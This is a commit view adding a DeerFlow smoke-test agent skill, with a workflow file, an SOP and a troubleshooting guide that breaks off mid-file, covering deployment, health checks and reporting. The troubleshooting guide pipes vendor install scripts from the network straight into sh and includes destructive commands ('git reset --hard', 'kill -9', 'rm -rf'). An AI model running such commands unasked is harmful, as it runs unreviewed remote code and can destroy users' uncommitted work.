Compare commits
48 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| e75a2ff29a | |||
| 185f5649dd | |||
| 092bf13f5e | |||
| fe2595a05c | |||
| 718dddde75 | |||
| 679ca657ee | |||
| fa96acdf4b | |||
| 90299e2710 | |||
| 7dc0c7d01f | |||
| 809b341350 | |||
| b1aabe88b8 | |||
| 654354c624 | |||
| eef0a6e2da | |||
| b107444878 | |||
| 16aa51c9b3 | |||
| 133ffe7174 | |||
| f88970985a | |||
| 6572fa5b75 | |||
| 194bab4691 | |||
| 35f141fc48 | |||
| 0b6fa8b9e1 | |||
| 140907ce1d | |||
| 52718b0f23 | |||
| 563383c60f | |||
| 1b74d84590 | |||
| 823f3af98c | |||
| 13664e99e7 | |||
| 60e0abfdb8 | |||
| 616caa92b1 | |||
| 31a3c9a3de | |||
| ad6d934a5f | |||
| 5350b2fb24 | |||
| 29817c3b34 | |||
| e5b149068c | |||
| 85b7ed3cec | |||
| 24805200f0 | |||
| 722a9c4753 | |||
| d1baf7212b | |||
| 0948c7a4e1 | |||
| c3170f22da | |||
| 1193ac64dc | |||
| ab41de2961 | |||
| 3b3e8e1b0b | |||
| 4004fb849f | |||
| f467e613b6 | |||
| f0dd8cb0d2 | |||
| 7643a46fca | |||
| c4da0e8ca9 |
@@ -0,0 +1,181 @@
|
||||
---
|
||||
name: smoke-test
|
||||
description: End-to-end smoke test skill for DeerFlow. Guides through: 1) Pulling latest code, 2) Docker OR Local installation and deployment (user preference, default to Local if Docker network issues), 3) Service availability verification, 4) Health check, 5) Final test report. Use when the user says "run smoke test", "smoke test deployment", "verify installation", "test service availability", "end-to-end test", or similar.
|
||||
---
|
||||
|
||||
# DeerFlow Smoke Test Skill
|
||||
|
||||
This skill guides the Agent through DeerFlow's full end-to-end smoke test workflow, including code updates, deployment (supporting both Docker and local installation modes), service availability verification, and health checks.
|
||||
|
||||
## Deployment Mode Selection
|
||||
|
||||
This skill supports two deployment modes:
|
||||
- **Local installation mode** (recommended, especially when network issues occur) - Run all services directly on the local machine
|
||||
- **Docker mode** - Run all services inside Docker containers
|
||||
|
||||
**Selection strategy**:
|
||||
- If the user explicitly asks for Docker mode, use Docker
|
||||
- If network issues occur (such as slow image pulls), automatically switch to local mode
|
||||
- Default to local mode whenever possible
|
||||
|
||||
## Structure
|
||||
|
||||
```
|
||||
smoke-test/
|
||||
├── SKILL.md ← You are here - core workflow and logic
|
||||
├── scripts/
|
||||
│ ├── check_docker.sh ← Check the Docker environment
|
||||
│ ├── check_local_env.sh ← Check local environment dependencies
|
||||
│ ├── frontend_check.sh ← Frontend page smoke check
|
||||
│ ├── pull_code.sh ← Pull the latest code
|
||||
│ ├── deploy_docker.sh ← Docker deployment
|
||||
│ ├── deploy_local.sh ← Local deployment
|
||||
│ └── health_check.sh ← Service health check
|
||||
├── references/
|
||||
│ ├── SOP.md ← Standard operating procedure
|
||||
│ └── troubleshooting.md ← Troubleshooting guide
|
||||
└── templates/
|
||||
├── report.local.template.md ← Local mode smoke test report template
|
||||
└── report.docker.template.md ← Docker mode smoke test report template
|
||||
```
|
||||
|
||||
## Standard Operating Procedure (SOP)
|
||||
|
||||
### Phase 1: Code Update Check
|
||||
|
||||
1. **Confirm current directory** - Verify that the current working directory is the DeerFlow project root
|
||||
2. **Check Git status** - See whether there are uncommitted changes
|
||||
3. **Pull the latest code** - Use `git pull origin main` to get the latest updates
|
||||
4. **Confirm code update** - Verify that the latest code was pulled successfully
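**Example commands (sketch, assuming the project root and the `main` branch)**:
```bash
# Phase 1: verify the project root, then pull the latest code
pwd
ls Makefile backend frontend config.example.yaml   # all four should exist
git status --short                                  # flag uncommitted changes first
git pull origin main
git log -1 --oneline                                # record the commit under test
```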
|
||||
|
||||
### Phase 2: Deployment Mode Selection and Environment Check
|
||||
|
||||
**Choose deployment mode**:
|
||||
- Ask for user preference, or choose automatically based on network conditions
|
||||
- Default to local installation mode
|
||||
|
||||
**Local mode environment check**:
|
||||
1. **Check Node.js version** - Requires 22+
|
||||
2. **Check pnpm** - Package manager
|
||||
3. **Check uv** - Python package manager
|
||||
4. **Check nginx** - Reverse proxy
|
||||
5. **Check required ports** - Confirm that ports 2026, 3000, 8001, and 2024 are not occupied
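**Example (sketch)**: the bundled environment check script covers these steps in one pass; the path below assumes the same skill directory as the frontend check in Phase 5.
```bash
# Checks Node.js 22+, pnpm, uv, nginx, and the required ports
bash .agent/skills/smoke-test/scripts/check_local_env.sh
```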
|
||||
|
||||
**Docker mode environment check** (if Docker is selected):
|
||||
1. **Check whether Docker is installed** - Run `docker --version`
|
||||
2. **Check Docker daemon status** - Run `docker info`
|
||||
3. **Check Docker Compose availability** - Run `docker compose version`
|
||||
4. **Check required ports** - Confirm that port 2026 is not occupied
|
||||
|
||||
### Phase 3: Configuration Preparation
|
||||
|
||||
1. **Check whether config.yaml exists**
|
||||
- If it does not exist, run `make config` to generate it
|
||||
- If it already exists, check whether it needs an upgrade with `make config-upgrade`
|
||||
2. **Check the .env file**
|
||||
- Verify that required environment variables are configured
|
||||
- Especially model API keys such as `OPENAI_API_KEY`
|
||||
|
||||
### Phase 4: Deployment Execution
|
||||
|
||||
**Local mode deployment**:
|
||||
1. **Check dependencies** - Run `make check`
|
||||
2. **Install dependencies** - Run `make install`
|
||||
3. **(Optional) Pre-pull the sandbox image** - If needed, run `make setup-sandbox`
|
||||
4. **Start services** - Run `make dev-daemon` (background mode, recommended) or `make dev` (foreground mode)
|
||||
5. **Wait for startup** - Give all services enough time to start completely (90-120 seconds recommended)
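**Example (sketch of the local deployment sequence)**:
```bash
make check        # validate Node.js 22+, pnpm, uv, nginx
make install      # install backend and frontend dependencies
make dev-daemon   # start LangGraph, Gateway, Frontend, and Nginx in the background
sleep 120         # allow 90-120 seconds for all services to come up
```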
|
||||
|
||||
**Docker mode deployment** (if Docker is selected):
|
||||
1. **Initialize Docker environment** - Run `make docker-init`
|
||||
2. **Start Docker services** - Run `make docker-start`
|
||||
3. **Wait for startup** - Give all containers enough time to start completely (60-90 seconds recommended)
|
||||
|
||||
### Phase 5: Service Health Check
|
||||
|
||||
**Local mode health check**:
|
||||
1. **Check process status** - Confirm that LangGraph, Gateway, Frontend, and Nginx processes are all running
|
||||
2. **Check frontend service** - Visit `http://localhost:2026` and verify that the page loads
|
||||
3. **Check API Gateway** - Verify the `http://localhost:2026/health` endpoint
|
||||
4. **Check LangGraph service** - Verify the availability of relevant endpoints
|
||||
5. **Frontend route smoke check** - Run `bash .agent/skills/smoke-test/scripts/frontend_check.sh` to verify key routes under `/workspace`
|
||||
|
||||
**Docker mode health check** (when using Docker):
|
||||
1. **Check container status** - Run `docker ps` and confirm that all containers are running
|
||||
2. **Check frontend service** - Visit `http://localhost:2026` and verify that the page loads
|
||||
3. **Check API Gateway** - Verify the `http://localhost:2026/health` endpoint
|
||||
4. **Check LangGraph service** - Verify the availability of relevant endpoints
|
||||
5. **Frontend route smoke check** - Run `bash .agent/skills/smoke-test/scripts/frontend_check.sh` to verify key routes under `/workspace`
|
||||
|
||||
### Optional Functional Verification
|
||||
|
||||
1. **List available models** - Verify that model configuration loads correctly
|
||||
2. **List available skills** - Verify that the skill directory is mounted correctly
|
||||
3. **Simple chat test** - Send a simple message to verify the end-to-end flow
|
||||
|
||||
### Phase 6: Generate Test Report
|
||||
|
||||
1. **Collect all test results** - Summarize execution status for each phase
|
||||
2. **Record encountered issues** - If anything fails, record the error details
|
||||
3. **Generate the final report** - Use the template that matches the selected deployment mode to create the complete test report, including overall conclusion, detailed key test cases, and explicit frontend page / route results
|
||||
4. **Provide follow-up recommendations** - Offer suggestions based on the test results
|
||||
|
||||
## Execution Rules
|
||||
|
||||
- **Follow the sequence** - Execute strictly in the order described above
|
||||
- **Idempotency** - Every step should be safe to repeat
|
||||
- **Error handling** - If a step fails, stop and report the issue, then provide troubleshooting suggestions
|
||||
- **Detailed logging** - Record the execution result and status of each step
|
||||
- **User confirmation** - Ask for confirmation before potentially risky operations such as overwriting config
|
||||
- **Mode preference** - Prefer local mode to avoid network-related issues
|
||||
- **Template requirement** - The final report must use the matching template under `templates/`; do not output a free-form summary instead of the template-based report
|
||||
- **Report clarity** - The execution summary must include the overall pass/fail conclusion plus per-case result explanations, and frontend smoke check results must be listed explicitly in the report
|
||||
- **Optional phase handling** - If functional verification is not executed, do not present it as a separate skipped phase in the final report
|
||||
|
||||
## Known Acceptable Warnings
|
||||
|
||||
The following warnings can appear during smoke testing and do not block a successful result:
|
||||
- Feishu/Lark SSL errors in Gateway logs (certificate verification failure) can be ignored if that channel is not enabled
|
||||
- Warnings in LangGraph logs about missing methods in the custom checkpointer, such as `adelete_for_runs` or `aprune`, do not affect the core functionality
|
||||
|
||||
## Key Tools
|
||||
|
||||
Use the following tools during execution:
|
||||
|
||||
1. **bash** - Run shell commands
|
||||
2. **present_file** - Show generated reports and important files
|
||||
3. **task_tool** - Organize complex steps with subtasks when needed
|
||||
|
||||
## Success Criteria
|
||||
|
||||
Smoke test pass criteria (local mode):
|
||||
- [x] Latest code is pulled successfully
|
||||
- [x] Local environment check passes (Node.js 22+, pnpm, uv, nginx)
|
||||
- [x] Configuration files are set up correctly
|
||||
- [x] `make check` passes
|
||||
- [x] `make install` completes successfully
|
||||
- [x] `make dev` starts successfully
|
||||
- [x] All service processes run normally
|
||||
- [x] Frontend page is accessible
|
||||
- [x] Frontend route smoke check passes (`/workspace` key routes)
|
||||
- [x] API Gateway health check passes
|
||||
- [x] Test report is generated completely
|
||||
|
||||
Smoke test pass criteria (Docker mode):
|
||||
- [x] Latest code is pulled successfully
|
||||
- [x] Docker environment check passes
|
||||
- [x] Configuration files are set up correctly
|
||||
- [x] `make docker-init` completes successfully
|
||||
- [x] `make docker-start` completes successfully
|
||||
- [x] All Docker containers run normally
|
||||
- [x] Frontend page is accessible
|
||||
- [x] Frontend route smoke check passes (`/workspace` key routes)
|
||||
- [x] API Gateway health check passes
|
||||
- [x] Test report is generated completely
|
||||
|
||||
## Read Reference Files
|
||||
|
||||
Before starting execution, read the following reference files:
|
||||
1. `references/SOP.md` - Detailed step-by-step operating instructions
|
||||
2. `references/troubleshooting.md` - Common issues and solutions
|
||||
3. `templates/report.local.template.md` - Local mode test report template
|
||||
4. `templates/report.docker.template.md` - Docker mode test report template
|
||||
@@ -0,0 +1,452 @@
|
||||
# DeerFlow Smoke Test Standard Operating Procedure (SOP)
|
||||
|
||||
This document describes the detailed operating steps for each phase of the DeerFlow smoke test.
|
||||
|
||||
## Phase 1: Code Update Check
|
||||
|
||||
### 1.1 Confirm Current Directory
|
||||
|
||||
**Objective**: Verify that the current working directory is the DeerFlow project root.
|
||||
|
||||
**Steps**:
|
||||
1. Run `pwd` to view the current working directory
|
||||
2. Check whether the directory contains the following files/directories:
|
||||
- `Makefile`
|
||||
- `backend/`
|
||||
- `frontend/`
|
||||
- `config.example.yaml`
|
||||
|
||||
**Success Criteria**: The current directory contains all of the files/directories listed above.
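**Example check (sketch)**:
```bash
# Fail fast if any expected project-root entry is missing
for entry in Makefile backend frontend config.example.yaml; do
  [ -e "$entry" ] || { echo "✗ Not the DeerFlow root: missing $entry"; exit 1; }
done
echo "✓ $(pwd) looks like the DeerFlow project root"
```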
|
||||
|
||||
---
|
||||
|
||||
### 1.2 Check Git Status
|
||||
|
||||
**Objective**: Check whether there are uncommitted changes.
|
||||
|
||||
**Steps**:
|
||||
1. Run `git status`
|
||||
2. Check whether the output includes "Changes not staged for commit" or "Untracked files"
|
||||
|
||||
**Notes**:
|
||||
- If there are uncommitted changes, recommend that the user commit or stash them first to avoid conflicts while pulling
|
||||
- If the user confirms that they want to continue, this step can be skipped
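**Example check (sketch, mirroring `scripts/pull_code.sh`)**:
```bash
# Empty porcelain output means the working tree is clean
if git status --porcelain | grep -q .; then
  echo "⚠ Uncommitted changes detected; commit or stash them before pulling"
  git status --short
else
  echo "✓ Working tree is clean"
fi
```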
|
||||
|
||||
---
|
||||
|
||||
### 1.3 Pull the Latest Code
|
||||
|
||||
**Objective**: Fetch the latest code updates.
|
||||
|
||||
**Steps**:
|
||||
1. Run `git fetch origin main`
|
||||
2. Run `git pull origin main`
|
||||
|
||||
**Success Criteria**:
|
||||
- The commands succeed without errors
|
||||
- The output shows "Already up to date" or indicates that new commits were pulled successfully
|
||||
|
||||
---
|
||||
|
||||
### 1.4 Confirm Code Update
|
||||
|
||||
**Objective**: Verify that the latest code was pulled successfully.
|
||||
|
||||
**Steps**:
|
||||
1. Run `git log -1 --oneline` to view the latest commit
|
||||
2. Record the commit hash and message
|
||||
|
||||
---
|
||||
|
||||
## Phase 2: Deployment Mode Selection and Environment Check
|
||||
|
||||
### 2.1 Choose Deployment Mode
|
||||
|
||||
**Objective**: Decide whether to use local mode or Docker mode.
|
||||
|
||||
**Decision Flow**:
|
||||
1. Prefer local mode first to avoid network-related issues
|
||||
2. If the user explicitly requests Docker, use Docker
|
||||
3. If Docker network issues occur, switch to local mode automatically
|
||||
|
||||
---
|
||||
|
||||
### 2.2 Local Mode Environment Check
|
||||
|
||||
**Objective**: Verify that local development environment dependencies are satisfied.
|
||||
|
||||
#### 2.2.1 Check Node.js Version
|
||||
|
||||
**Steps**:
|
||||
1. If nvm is used, run `nvm use 22` to switch to Node 22+
|
||||
2. Run `node --version`
|
||||
|
||||
**Success Criteria**: Version >= 22.x
|
||||
|
||||
**Failure Handling**:
|
||||
- If the version is too low, ask the user to install/switch Node.js with nvm:
|
||||
```bash
|
||||
nvm install 22
|
||||
nvm use 22
|
||||
```
|
||||
- Or install it from the official website: https://nodejs.org/
|
||||
|
||||
---
|
||||
|
||||
#### 2.2.2 Check pnpm
|
||||
|
||||
**Steps**:
|
||||
1. Run `pnpm --version`
|
||||
|
||||
**Success Criteria**: The command returns pnpm version information.
|
||||
|
||||
**Failure Handling**:
|
||||
- If pnpm is not installed, ask the user to install it with `npm install -g pnpm`
|
||||
|
||||
---
|
||||
|
||||
#### 2.2.3 Check uv
|
||||
|
||||
**Steps**:
|
||||
1. Run `uv --version`
|
||||
|
||||
**Success Criteria**: The command returns uv version information.
|
||||
|
||||
**Failure Handling**:
|
||||
- If uv is not installed, ask the user to install uv
|
||||
|
||||
---
|
||||
|
||||
#### 2.2.4 Check nginx
|
||||
|
||||
**Steps**:
|
||||
1. Run `nginx -v`
|
||||
|
||||
**Success Criteria**: The command returns nginx version information.
|
||||
|
||||
**Failure Handling**:
|
||||
- macOS: install with Homebrew using `brew install nginx`
|
||||
- Linux: install using the system package manager
|
||||
|
||||
---
|
||||
|
||||
#### 2.2.5 Check Required Ports
|
||||
|
||||
**Steps**:
|
||||
1. Run the following commands to check ports:
|
||||
```bash
|
||||
lsof -i :2026 # Main port
|
||||
lsof -i :3000 # Frontend
|
||||
lsof -i :8001 # Gateway
|
||||
lsof -i :2024 # LangGraph
|
||||
```
|
||||
|
||||
**Success Criteria**: All ports are free, or they are occupied only by DeerFlow-related processes.
|
||||
|
||||
**Failure Handling**:
|
||||
- If a port is occupied, ask the user to stop the related process
|
||||
|
||||
---
|
||||
|
||||
### 2.3 Docker Mode Environment Check (If Docker Is Selected)
|
||||
|
||||
#### 2.3.1 Check Whether Docker Is Installed
|
||||
|
||||
**Steps**:
|
||||
1. Run `docker --version`
|
||||
|
||||
**Success Criteria**: The command returns Docker version information, such as "Docker version 24.x.x".
|
||||
|
||||
---
|
||||
|
||||
#### 2.3.2 Check Docker Daemon Status
|
||||
|
||||
**Steps**:
|
||||
1. Run `docker info`
|
||||
|
||||
**Success Criteria**: The command runs successfully and shows Docker system information.
|
||||
|
||||
**Failure Handling**:
|
||||
- If it fails, ask the user to start Docker Desktop or the Docker service
|
||||
|
||||
---
|
||||
|
||||
#### 2.3.3 Check Docker Compose Availability
|
||||
|
||||
**Steps**:
|
||||
1. Run `docker compose version`
|
||||
|
||||
**Success Criteria**: The command returns Docker Compose version information.
|
||||
|
||||
---
|
||||
|
||||
#### 2.3.4 Check Required Ports
|
||||
|
||||
**Steps**:
|
||||
1. Run `lsof -i :2026` (macOS/Linux) or `netstat -ano | findstr :2026` (Windows)
|
||||
|
||||
**Success Criteria**: Port 2026 is free, or it is occupied only by a DeerFlow-related process.
|
||||
|
||||
**Failure Handling**:
|
||||
- If the port is occupied by another process, ask the user to stop that process or change the configuration
|
||||
|
||||
---
|
||||
|
||||
## Phase 3: Configuration Preparation
|
||||
|
||||
### 3.1 Check config.yaml
|
||||
|
||||
**Steps**:
|
||||
1. Check whether `config.yaml` exists
|
||||
2. If it does not exist, run `make config`
|
||||
3. If it already exists, consider running `make config-upgrade` to merge new fields
|
||||
|
||||
**Validation**:
|
||||
- Check whether at least one model is configured in config.yaml
|
||||
- Check whether the model configuration references the correct environment variables
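**Example check (sketch; the `models` grep is only a heuristic and assumes model definitions live under a `models` key)**:
```bash
if [ ! -f config.yaml ]; then
  make config            # generate a fresh config.yaml
else
  make config-upgrade    # merge any newly added fields into the existing file
fi
grep -q "models" config.yaml || echo "⚠ No model configuration found in config.yaml"
```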
|
||||
|
||||
---
|
||||
|
||||
### 3.2 Check the .env File
|
||||
|
||||
**Steps**:
|
||||
1. Check whether the `.env` file exists
|
||||
2. If it does not exist, copy it from `.env.example`
|
||||
3. Check whether the following environment variables are configured:
|
||||
- `OPENAI_API_KEY` (or other model API keys)
|
||||
- Other required settings
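**Example check (sketch)**:
```bash
# Create .env from the example if missing, then look for a model API key
[ -f .env ] || cp .env.example .env
grep -q '^OPENAI_API_KEY=' .env || echo "⚠ OPENAI_API_KEY is not set in .env (set it, or another provider's key)"
```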
|
||||
|
||||
---
|
||||
|
||||
## Phase 4: Deployment Execution
|
||||
|
||||
### 4.1 Local Mode Deployment
|
||||
|
||||
#### 4.1.1 Check Dependencies
|
||||
|
||||
**Steps**:
|
||||
1. Run `make check`
|
||||
|
||||
**Description**: This command validates all required tools (Node.js 22+, pnpm, uv, nginx).
|
||||
|
||||
---
|
||||
|
||||
#### 4.1.2 Install Dependencies
|
||||
|
||||
**Steps**:
|
||||
1. Run `make install`
|
||||
|
||||
**Description**: This command installs both backend and frontend dependencies.
|
||||
|
||||
**Notes**:
|
||||
- This step may take some time
|
||||
- If network issues cause failures, try using a closer or mirrored package registry
|
||||
|
||||
---
|
||||
|
||||
#### 4.1.3 (Optional) Pre-pull the Sandbox Image
|
||||
|
||||
**Steps**:
|
||||
1. If Docker / Container sandbox is used, run `make setup-sandbox`
|
||||
|
||||
**Description**: This step is optional and not needed for local sandbox mode.
|
||||
|
||||
---
|
||||
|
||||
#### 4.1.4 Start Services
|
||||
|
||||
**Steps**:
|
||||
1. Run `make dev-daemon` (background mode)
|
||||
|
||||
**Description**: This command starts all services (LangGraph, Gateway, Frontend, Nginx).
|
||||
|
||||
**Notes**:
|
||||
- `make dev` runs in the foreground and stops with Ctrl+C
|
||||
- `make dev-daemon` runs in the background
|
||||
- Use `make stop` to stop services
|
||||
|
||||
---
|
||||
|
||||
#### 4.1.5 Wait for Services to Start
|
||||
|
||||
**Steps**:
|
||||
1. Wait 90-120 seconds for all services to start completely
|
||||
2. You can monitor startup progress by checking these log files:
|
||||
- `logs/langgraph.log`
|
||||
- `logs/gateway.log`
|
||||
- `logs/frontend.log`
|
||||
- `logs/nginx.log`
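**Example (sketch)**: instead of a fixed sleep, the wait can poll the gateway health endpoint used in Phase 5.
```bash
# Poll for up to ~120 seconds until the gateway answers on the main port
for i in $(seq 1 24); do
  if curl -sf http://localhost:2026/health >/dev/null; then
    echo "✓ Services responded after about $((i * 5)) seconds"
    break
  fi
  sleep 5
done
```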
|
||||
|
||||
---
|
||||
|
||||
### 4.2 Docker Mode Deployment (If Docker Is Selected)
|
||||
|
||||
#### 4.2.1 Initialize the Docker Environment
|
||||
|
||||
**Steps**:
|
||||
1. Run `make docker-init`
|
||||
|
||||
**Description**: This command pulls the sandbox image if needed.
|
||||
|
||||
---
|
||||
|
||||
#### 4.2.2 Start Docker Services
|
||||
|
||||
**Steps**:
|
||||
1. Run `make docker-start`
|
||||
|
||||
**Description**: This command builds and starts all required Docker containers.
|
||||
|
||||
---
|
||||
|
||||
#### 4.2.3 Wait for Services to Start
|
||||
|
||||
**Steps**:
|
||||
1. Wait 60-90 seconds for all services to start completely
|
||||
2. You can run `make docker-logs` to monitor startup progress
|
||||
|
||||
---
|
||||
|
||||
## Phase 5: Service Health Check
|
||||
|
||||
### 5.1 Local Mode Health Check
|
||||
|
||||
#### 5.1.1 Check Process Status
|
||||
|
||||
**Steps**:
|
||||
1. Run the following command to check processes:
|
||||
```bash
|
||||
ps aux | grep -E "(langgraph|uvicorn|next|nginx)" | grep -v grep
|
||||
```
|
||||
|
||||
**Success Criteria**: Confirm that the following processes are running:
|
||||
- LangGraph (`langgraph dev`)
|
||||
- Gateway (`uvicorn app.gateway.app:app`)
|
||||
- Frontend (`next dev` or `next start`)
|
||||
- Nginx (`nginx`)
|
||||
|
||||
---
|
||||
|
||||
#### 5.1.2 Check Frontend Service
|
||||
|
||||
**Steps**:
|
||||
1. Use curl or a browser to visit `http://localhost:2026`
|
||||
2. Verify that the page loads normally
|
||||
|
||||
**Example curl command**:
|
||||
```bash
|
||||
curl -I http://localhost:2026
|
||||
```
|
||||
|
||||
**Success Criteria**: Returns an HTTP 200 status code.
|
||||
|
||||
---
|
||||
|
||||
#### 5.1.3 Check API Gateway
|
||||
|
||||
**Steps**:
|
||||
1. Visit `http://localhost:2026/health`
|
||||
|
||||
**Example curl command**:
|
||||
```bash
|
||||
curl http://localhost:2026/health
|
||||
```
|
||||
|
||||
**Success Criteria**: Returns health status JSON.
|
||||
|
||||
---
|
||||
|
||||
#### 5.1.4 Check LangGraph Service
|
||||
|
||||
**Steps**:
|
||||
1. Visit relevant LangGraph endpoints to verify availability
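**Example check (sketch)**: the bundled health check treats any HTTP response from the LangGraph port as availability.
```bash
# LangGraph listens on port 2024 in local mode; 200 or 404 both mean the server is up
curl -s -o /dev/null -w "%{http_code}\n" http://localhost:2024/
```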
|
||||
|
||||
---
|
||||
|
||||
### 5.2 Docker Mode Health Check (When Using Docker)
|
||||
|
||||
#### 5.2.1 Check Container Status
|
||||
|
||||
**Steps**:
|
||||
1. Run `docker ps`
|
||||
2. Confirm that the following containers are running:
|
||||
- `deer-flow-nginx`
|
||||
- `deer-flow-frontend`
|
||||
- `deer-flow-gateway`
|
||||
- `deer-flow-langgraph` (if not in gateway mode)
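**Example command (sketch)**:
```bash
# List only DeerFlow containers with their status
docker ps --format '{{.Names}}\t{{.Status}}' | grep deer-flow
```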
|
||||
|
||||
---
|
||||
|
||||
#### 5.2.2 Check Frontend Service
|
||||
|
||||
**Steps**:
|
||||
1. Use curl or a browser to visit `http://localhost:2026`
|
||||
2. Verify that the page loads normally
|
||||
|
||||
**Example curl command**:
|
||||
```bash
|
||||
curl -I http://localhost:2026
|
||||
```
|
||||
|
||||
**Success Criteria**: Returns an HTTP 200 status code.
|
||||
|
||||
---
|
||||
|
||||
#### 5.2.3 Check API Gateway
|
||||
|
||||
**Steps**:
|
||||
1. Visit `http://localhost:2026/health`
|
||||
|
||||
**Example curl command**:
|
||||
```bash
|
||||
curl http://localhost:2026/health
|
||||
```
|
||||
|
||||
**Success Criteria**: Returns health status JSON.
|
||||
|
||||
---
|
||||
|
||||
#### 5.2.4 Check LangGraph Service
|
||||
|
||||
**Steps**:
|
||||
1. Visit relevant LangGraph endpoints to verify availability
|
||||
|
||||
---
|
||||
|
||||
## Optional Functional Verification
|
||||
|
||||
### List Available Models
|
||||
|
||||
**Steps**: Verify the model list through the API or UI.
|
||||
|
||||
---
|
||||
|
||||
### List Available Skills
|
||||
|
||||
**Steps**: Verify the skill list through the API or UI.
|
||||
|
||||
---
|
||||
|
||||
### Simple Chat Test
|
||||
|
||||
**Steps**: Send a simple message to test the complete workflow.
|
||||
|
||||
---
|
||||
|
||||
## Phase 6: Generate the Test Report
|
||||
|
||||
### 6.1 Collect Test Results
|
||||
|
||||
Summarize the execution status of each phase and record successful and failed items.
|
||||
|
||||
### 6.2 Record Issues
|
||||
|
||||
If anything fails, record detailed error information.
|
||||
|
||||
### 6.3 Generate the Report
|
||||
|
||||
Use the template to create a complete test report.
|
||||
|
||||
### 6.4 Provide Recommendations
|
||||
|
||||
Provide follow-up recommendations based on the test results.
|
||||
@@ -0,0 +1,612 @@
|
||||
# Troubleshooting Guide
|
||||
|
||||
This document lists common issues encountered during DeerFlow smoke testing and how to resolve them.
|
||||
|
||||
## Code Update Issues
|
||||
|
||||
### Issue: `git pull` Fails with a Merge Conflict Warning
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
error: Your local changes to the following files would be overwritten by merge
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Option A: Commit local changes first
|
||||
```bash
|
||||
git add .
|
||||
git commit -m "Save local changes"
|
||||
git pull origin main
|
||||
```
|
||||
|
||||
2. Option B: Stash local changes
|
||||
```bash
|
||||
git stash
|
||||
git pull origin main
|
||||
git stash pop # Restore changes later if needed
|
||||
```
|
||||
|
||||
3. Option C: Discard local changes (use with caution)
|
||||
```bash
|
||||
git reset --hard HEAD
|
||||
git pull origin main
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Local Mode Environment Issues
|
||||
|
||||
### Issue: Node.js Version Is Too Old
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
Node.js version is too old. Requires 22+, got x.x.x
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Install or upgrade Node.js with nvm:
|
||||
```bash
|
||||
nvm install 22
|
||||
nvm use 22
|
||||
```
|
||||
|
||||
2. Or download and install it from the official website: https://nodejs.org/
|
||||
|
||||
3. Verify the version:
|
||||
```bash
|
||||
node --version
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: pnpm Is Not Installed
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
command not found: pnpm
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Install pnpm with npm:
|
||||
```bash
|
||||
npm install -g pnpm
|
||||
```
|
||||
|
||||
2. Or use the official installation script:
|
||||
```bash
|
||||
curl -fsSL https://get.pnpm.io/install.sh | sh -
|
||||
```
|
||||
|
||||
3. Verify the installation:
|
||||
```bash
|
||||
pnpm --version
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: uv Is Not Installed
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
command not found: uv
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Use the official installation script:
|
||||
```bash
|
||||
curl -LsSf https://astral.sh/uv/install.sh | sh
|
||||
```
|
||||
|
||||
2. macOS users can also install it with Homebrew:
|
||||
```bash
|
||||
brew install uv
|
||||
```
|
||||
|
||||
3. Verify the installation:
|
||||
```bash
|
||||
uv --version
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: nginx Is Not Installed
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
command not found: nginx
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. macOS (Homebrew):
|
||||
```bash
|
||||
brew install nginx
|
||||
```
|
||||
|
||||
2. Ubuntu/Debian:
|
||||
```bash
|
||||
sudo apt update
|
||||
sudo apt install nginx
|
||||
```
|
||||
|
||||
3. CentOS/RHEL:
|
||||
```bash
|
||||
sudo yum install nginx
|
||||
```
|
||||
|
||||
4. Verify the installation:
|
||||
```bash
|
||||
nginx -v
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: Port Is Already in Use
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
Error: listen EADDRINUSE: address already in use :::2026
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Find the process using the port:
|
||||
```bash
|
||||
lsof -i :2026 # macOS/Linux
|
||||
netstat -ano | findstr :2026 # Windows
|
||||
```
|
||||
|
||||
2. Stop that process:
|
||||
```bash
|
||||
kill -9 <PID> # macOS/Linux
|
||||
taskkill /PID <PID> /F # Windows
|
||||
```
|
||||
|
||||
3. Or stop DeerFlow services first:
|
||||
```bash
|
||||
make stop
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Local Mode Dependency Installation Issues
|
||||
|
||||
### Issue: `make install` Fails Due to Network Timeout
|
||||
|
||||
**Symptoms**:
|
||||
Network timeouts or connection failures occur during dependency installation.
|
||||
|
||||
**Solutions**:
|
||||
1. Configure pnpm to use a mirror registry:
|
||||
```bash
|
||||
pnpm config set registry https://registry.npmmirror.com
|
||||
```
|
||||
|
||||
2. Configure uv to use a mirror registry (uv reads the index URL from an environment variable; there is no `uv pip config` subcommand):
```bash
export UV_INDEX_URL="https://pypi.tuna.tsinghua.edu.cn/simple"  # newer uv releases also accept UV_DEFAULT_INDEX
|
||||
```
|
||||
|
||||
3. Retry the installation:
|
||||
```bash
|
||||
make install
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: Python Dependency Installation Fails
|
||||
|
||||
**Symptoms**:
|
||||
Errors occur during `uv sync`.
|
||||
|
||||
**Solutions**:
|
||||
1. Clean the uv cache:
|
||||
```bash
|
||||
cd backend
|
||||
uv cache clean
|
||||
```
|
||||
|
||||
2. Resync dependencies:
|
||||
```bash
|
||||
cd backend
|
||||
uv sync
|
||||
```
|
||||
|
||||
3. View detailed error logs:
|
||||
```bash
|
||||
cd backend
|
||||
uv sync --verbose
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: Frontend Dependency Installation Fails
|
||||
|
||||
**Symptoms**:
|
||||
Errors occur during `pnpm install`.
|
||||
|
||||
**Solutions**:
|
||||
1. Clean the pnpm cache:
|
||||
```bash
|
||||
cd frontend
|
||||
pnpm store prune
|
||||
```
|
||||
|
||||
2. Remove node_modules and the lock file:
|
||||
```bash
|
||||
cd frontend
|
||||
rm -rf node_modules pnpm-lock.yaml
|
||||
